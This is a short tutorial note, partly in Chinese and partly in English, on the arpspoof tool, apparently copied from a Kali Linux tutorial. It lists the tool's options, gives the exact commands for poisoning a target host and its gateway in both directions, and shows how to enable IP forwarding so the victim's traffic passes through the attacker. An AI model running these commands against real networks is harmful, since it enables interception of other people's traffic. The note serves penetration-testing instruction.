ARPspoof
原文链接: ARPspoof
[](https://wizardforcel.gitbooks.io/daxueba-kali-linux-tutorial/content/58.html)
Usage: arpspoof [-i interface] [-t target] host
-i interface 指定使用的网卡
-c own|host|both 攻击结束后如何恢复
-r 双向毒化
-t target 指定要攻击的目标
host 指定要拦截的主机(默认为网关)
启动Arpspoof注入攻击目标系统。攻击的方法是攻击者(192.168.6.100)发送ARP数据包,以欺骗网关(192.168.6.1)和目标系统(192.168.6.101)。
- 下面首先欺骗目标系统,执行命令如下所示:
arpspoof -i eth0 -t 192.168.6.101 192.168.6.1
- 使用Arpspoof欺骗网关。执行命令如下所示:
arpspoof -i eth0 -t 192.168.6.1 192.168.6.101
##########
Don't forget to enable IP forwarding on your host so that the traffic goes through your host. Otherwise victim will loose connectivity.
echo 1 > /proc/sys/net/ipv4/ip_forward
In order to tell the victim host that now we (our MAC address) are the one belonging to the IP of the gateway enter the following command:
arpspoof -t victim gateway
In a seperate shell we start the matching command to fool gateway to belive we are victim.